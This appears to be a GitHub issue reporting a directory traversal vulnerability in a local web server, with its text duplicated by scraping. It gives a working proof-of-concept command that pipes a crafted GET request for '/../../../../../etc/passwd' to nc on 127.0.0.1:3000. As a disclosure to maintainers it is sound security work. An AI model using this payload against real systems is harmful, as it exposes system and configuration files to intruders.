Open happi0 opened 2 years ago
Directory traversal.
Hackers can gain access to a wealth of sensitive information including configuration files.
For example, here I can read my /etc/passwd use echo -e "GET /../../../../../etc/passwd HTTP/1.0\r\nHost: 127.0.0.1:3000\r\n\r\n" | nc 127.0.0.1 3000
/etc/passwd
echo -e "GET /../../../../../etc/passwd HTTP/1.0\r\nHost: 127.0.0.1:3000\r\n\r\n" | nc 127.0.0.1 3000
Directory traversal.
Hackers can gain access to a wealth of sensitive information including configuration files.
For example, here I can read my
/etc/passwduseecho -e "GET /../../../../../etc/passwd HTTP/1.0\r\nHost: 127.0.0.1:3000\r\n\r\n" | nc 127.0.0.1 3000